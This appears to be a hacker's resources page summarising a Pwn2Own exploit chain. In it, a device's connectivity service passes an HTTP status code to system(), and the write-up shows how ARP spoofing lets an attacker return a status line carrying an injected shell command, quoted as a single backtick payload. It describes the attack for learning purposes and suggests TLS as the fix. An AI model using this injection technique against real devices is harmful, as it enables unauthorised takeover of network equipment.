Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

On boot and every 300 seconds, the ConnectivityService binary verifies a few things about connections. When doing this, it tries to reach the REST server ping the local gateway and tries to reach the remote cloud.

While making this request, it uses wget from system in C. The output of the call is put into a text file, this is then checked for a response. This response code is then used for a logging call via another call to system. Damn, system has to be vulnerable, right?

If a malicious HTTP status is returned, then there is a command injection vulnerability. Something like HTTP/1.0 200 `touch /tmp/pwn2own` would result in a command injection on the device. How do we get a malicious response from this though? ARP spoofing!

ARP (Address Resolution Protocol) i messages are sent over the local area network (LAN) to link a MAC address with an IP address. If an attacker sends out bad ARP messages, then they can link the attackers MAC address with an IP address of something on the network. Since the MAC address of the attacker computer is linked with an actual IP, the attacker will receive the network traffic instead.

To control the response, they ARP spoof the device by sending ARP responses to the device for the LAN gateway so that all outgoing traffic from that target device is headed the attackers way. Once this is done, they use scapy to sniff for ICMP and some other DNS traffic to respond accordingly. Finally, the ConnectivityService will contact our malicious HTTP server, where we can send our command injection payload. Neat!

While running the exploit at Pwn2Own Mobile, they made a critical mistake. They had hardcoded an IP address for their local network in their test environment. While they did notice this problem and fix it on the fly, their time ran out since no more DNS requests were being made. Sad :(

Overall, this is an awesome chain! To me, I enjoyed how they turned an obvious command injection with an impossible situation into something that could be controlled via ARP spoofing. A simple solution for this would be to use TLS!